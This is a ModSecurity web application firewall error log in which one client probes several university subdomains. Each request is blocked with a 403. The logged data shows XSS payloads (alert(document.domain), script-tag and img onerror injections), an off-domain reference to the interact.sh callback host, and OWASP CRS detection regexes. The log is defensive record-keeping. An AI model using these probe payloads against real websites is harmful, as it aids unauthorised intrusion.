[Tue Aug 29 11:51:58.565209 2023] [:error] [pid 2538] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:cyclePeriod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:cyclePeriod: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "journal.unla.ac.id"] [uri "/plugins/servlet/Wallboard/"] [unique_id "ZO15bsCo-f0AAAnqj98AAAAC"]
[Tue Aug 29 11:51:58.566911 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:cyclePeriod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:cyclePeriod: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/plugins/servlet/Wallboard/"] [unique_id "ZO15bsCo-f0AAAn40xoAAAAW"]
[Tue Aug 29 11:51:58.574560 2023] [:error] [pid 2529] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:cyclePeriod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:cyclePeriod: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/plugins/servlet/Wallboard/"] [unique_id "ZO15bsCo-f0AAAnh6OQAAAAS"]
[Tue Aug 29 11:51:58.577179 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:cyclePeriod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:cyclePeriod: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/servlet/Wallboard/"] [unique_id "ZO15bsCo-f0AAAfWOJ0AAAAL"]
[Tue Aug 29 11:51:58.649637 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:cyclePeriod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:cyclePeriod: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/plugins/servlet/Wallboard/"] [unique_id "ZO15bsCo-f0AAAnEqUcAAAAO"]
[Tue Aug 29 11:51:59.019092 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22\\x22></ found within ARGS:id: \\x22\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/zimbra/h/search"] [unique_id "ZO15b8Co-f0AAAlUln0AAAA0"]
[Tue Aug 29 11:51:59.546079 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date-from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:date-from: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/date_select.php"] [unique_id "ZO15b8Co-f0AAAjdQYsAAAAZ"]
[Tue Aug 29 11:51:59.570970 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date-from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:date-from: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/date_select.php"] [unique_id "ZO15b8Co-f0AAAngCW8AAAAP"]
[Tue Aug 29 11:51:59.571392 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date-from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:date-from: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/date_select.php"] [unique_id "ZO15b8Co-f0AAAnd3C4AAAAI"]
[Tue Aug 29 11:51:59.572691 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/echo-server.html"] [unique_id "ZO15b8Co-f0AAAnEqUsAAAAO"]
[Tue Aug 29 11:51:59.573322 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/echo-server.html"] [unique_id "ZO15b8Co-f0AAAjdQYwAAAAZ"]
[Tue Aug 29 11:51:59.573385 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/echo-server.html"] [unique_id "ZO15b8Co-f0AAAnkwdUAAAAY"]
[Tue Aug 29 11:51:59.573489 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date-from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:date-from: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/date_select.php"] [unique_id "ZO15b8Co-f0AAAn0GZUAAAAa"]
[Tue Aug 29 11:51:59.575794 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date-from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:date-from: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/date_select.php"] [unique_id "ZO15b8Co-f0AAAnIlmYAAAAV"]
[Tue Aug 29 11:51:59.591044 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/echo-server.html"] [unique_id "ZO15b8Co-f0AAAn958wAAAAD"]
[Tue Aug 29 11:51:59.594755 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/echo-server.html"] [unique_id "ZO15b8Co-f0AAAm7nEoAAAAE"]
[Tue Aug 29 11:51:59.604076 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:cyclePeriod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:cyclePeriod: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/plugins/servlet/Wallboard/"] [unique_id "ZO15b8Co-f0AAAnIlmcAAAAV"]
[Tue Aug 29 11:52:00.562437 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date-from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:date-from: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/date_select.php"] [unique_id "ZO15cMCo-f0AAAnd3DAAAAAI"]
[Tue Aug 29 11:52:00.565397 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/echo-server.html"] [unique_id "ZO15cMCo-f0AAAn40x8AAAAW"]
[Tue Aug 29 11:52:01.559933 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bundle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:bundle: ';alert(document.domain);var ok='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/passwordreset"] [unique_id "ZO15ccCo-f0AAAlUloMAAAA0"]
[Tue Aug 29 11:52:01.570858 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bundle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:bundle: ';alert(document.domain);var ok='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/passwordreset"] [unique_id "ZO15ccCo-f0AAAn9588AAAAD"]
[Tue Aug 29 11:52:01.576708 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bundle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:bundle: ';alert(document.domain);var ok='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/passwordreset"] [unique_id "ZO15ccCo-f0AAAnn1-oAAAAe"]
[Tue Aug 29 11:52:01.583139 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bundle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:bundle: ';alert(document.domain);var ok='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/passwordreset"] [unique_id "ZO15ccCo-f0AAAm7nE0AAAAE"]
[Tue Aug 29 11:52:01.596435 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bundle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:bundle: ';alert(document.domain);var ok='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/passwordreset"] [unique_id "ZO15ccCo-f0AAAnn1-sAAAAe"]
[Tue Aug 29 11:52:02.565407 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search_title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search_title: \\x22><img src=x onerror=alert(domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/plugins/jobsearch/"] [unique_id "ZO15csCo-f0AAAjdQZMAAAAZ"]
[Tue Aug 29 11:52:02.569693 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search_title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search_title: \\x22><img src=x onerror=alert(domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/plugins/jobsearch/"] [unique_id "ZO15csCo-f0AAAfWOKMAAAAL"]
[Tue Aug 29 11:52:02.630190 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search_title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search_title: \\x22><img src=x onerror=alert(domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/jobsearch/"] [unique_id "ZO15csCo-f0AAAnn1-0AAAAe"]
[Tue Aug 29 11:52:02.691186 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search_title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search_title: \\x22><img src=x onerror=alert(domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/plugins/jobsearch/"] [unique_id "ZO15csCo-f0AAAm7nE8AAAAE"]
